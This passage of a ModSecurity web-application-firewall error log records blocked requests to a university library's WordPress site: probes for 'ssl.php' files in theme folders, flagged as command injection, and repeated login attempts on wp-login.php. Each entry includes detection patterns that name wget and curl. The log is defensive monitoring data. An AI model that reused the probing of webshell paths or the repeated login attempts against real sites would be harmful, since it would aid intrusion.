"ZOzIBcCo-f0AANQFgyQAAAAy"]
[Mon Aug 28 23:15:01.860942 2023] [:error] [pid 54277] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwentyone/ssl.php"] [unique_id "ZOzIBcCo-f0AANQFgyUAAAAy"]
[Mon Aug 28 23:15:08.628838 2023] [:error] [pid 54295] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwentyone/ssl.php"] [unique_id "ZOzIDMCo-f0AANQXOkEAAAAi"]
[Mon Aug 28 23:15:12.610920 2023] [:error] [pid 54295] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwentyone/ssl.php"] [unique_id "ZOzIEMCo-f0AANQXOkMAAAAi"]
[Mon Aug 28 23:16:24.629030 2023] [:error] [pid 54437] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzIWMCo-f0AANSlorMAAAAL"]
[Mon Aug 28 23:17:23.379688 2023] [:error] [pid 54446] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwenty/ssl.php"] [unique_id "ZOzIk8Co-f0AANSu6ZkAAAAE"]
[Mon Aug 28 23:17:23.403137 2023] [:error] [pid 54445] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwenty/ssl.php"] [unique_id "ZOzIk8Co-f0AANStw@MAAAAC"]
[Mon Aug 28 23:17:23.459800 2023] [:error] [pid 54445] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwenty/ssl.php"] [unique_id "ZOzIk8Co-f0AANStw@QAAAAC"]
[Mon Aug 28 23:17:25.856414 2023] [:error] [pid 54445] [client 23.106.249.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:s_wget. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: Wget found within REQUEST_COOKIES:s_wget: GNU+Wget+1.15+built+on+linux-gnu."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/twentytwenty/ssl.php"] [unique_id "ZOzIlcCo-f0AANStw@UAAAAC"]
[Mon Aug 28 23:18:52.025223 2023] [:error] [pid 54297] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzI7MCo-f0AANQZ9B0AAAAm"]
[Mon Aug 28 23:21:20.086490 2023] [:error] [pid 55003] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzJgMCo-f0AANbbrMsAAAAg"]
[Mon Aug 28 23:23:47.343711 2023] [:error] [pid 55003] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzKE8Co-f0AANbbrM4AAAAg"]
[Mon Aug 28 23:26:19.837397 2023] [:error] [pid 55060] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzKq8Co-f0AANcU0UgAAAAX"]
[Mon Aug 28 23:28:51.969341 2023] [:error] [pid 55011] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzLQ8Co-f0AANbjqTMAAAAM"]
[Mon Aug 28 23:31:22.116681 2023] [:error] [pid 55067] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzL2sCo-f0AANcbzywAAAAN"]
[Mon Aug 28 23:33:51.169315 2023] [:error] [pid 55246] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzMb8Co-f0AANfOJ5AAAAAD"]
[Mon Aug 28 23:36:20.326915 2023] [:error] [pid 55003] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzNBMCo-f0AANbbrPYAAAAg"]
[Mon Aug 28 23:38:50.324435 2023] [:error] [pid 55234] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzNmsCo-f0AANfCeZkAAAAX"]
[Mon Aug 28 23:41:18.020726 2023] [:error] [pid 55245] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzOLsCo-f0AANfNEgMAAAAB"]
[Mon Aug 28 23:43:44.079415 2023] [:error] [pid 55315] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzOwMCo-f0AANgTPC0AAAAR"]
[Mon Aug 28 23:46:13.347045 2023] [:error] [pid 55405] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzPVcCo-f0AANhth9QAAAAd"]
[Mon Aug 28 23:48:42.557450 2023] [:error] [pid 55494] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzP6sCo-f0AANjGkssAAAAQ"]
[Mon Aug 28 23:51:11.705529 2023] [:error] [pid 55299] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzQf8Co-f0AANgD6noAAAAU"]
[Mon Aug 28 23:53:40.125618 2023] [:error] [pid 55690] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzRFMCo-f0AANmKWv8AAAAD"]
[Mon Aug 28 23:56:09.427119 2023] [:error] [pid 55876] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzRqcCo-f0AANpE6lgAAAAQ"]
[Mon Aug 28 23:58:42.081535 2023] [:error] [pid 55958] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzSQsCo-f0AANqWeAkAAAAZ"]
[Tue Aug 29 00:01:13.572570 2023] [:error] [pid 56093] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzS2cCo-f0AANsdsE4AAAAE"]
[Tue Aug 29 00:03:43.095447 2023] [:error] [pid 56095] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzTb8Co-f0AANsfIkMAAAAK"]
[Tue Aug 29 00:06:11.047034 2023] [:error] [pid 56112] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzUA8Co-f0AANswShUAAAAB"]
[Tue Aug 29 00:08:38.034926 2023] [:error] [pid 56176] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzUlsCo-f0AANtw080AAAAa"]
[Tue Aug 29 00:11:08.447628 2023] [:error] [pid 56174] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzVLMCo-f0AANtu3LMAAAAJ"]
[Tue Aug 29 00:13:37.252234 2023] [:error] [pid 56180] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzVwcCo-f0AANt0BwEAAAAF"]
[Tue Aug 29 00:16:08.798798 2023] [:error] [pid 56379] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzWWMCo-f0AANw7AWYAAAAK"]
[Tue Aug 29 00:18:37.172959 2023] [:error] [pid 56310] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzW7cCo-f0AANv2rMEAAAAA"]
[Tue Aug 29 00:21:06.543002 2023] [:error] [pid 56447] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzXgsCo-f0AANx-vIQAAAAF"]
[Tue Aug 29 00:23:33.693749 2023] [:error] [pid 56491] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzYFcCo-f0AANyr2icAAAAS"]
[Tue Aug 29 00:26:02.045725 2023] [:error] [pid 56411] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzYqsCo-f0AANxbFUUAAAAD"]
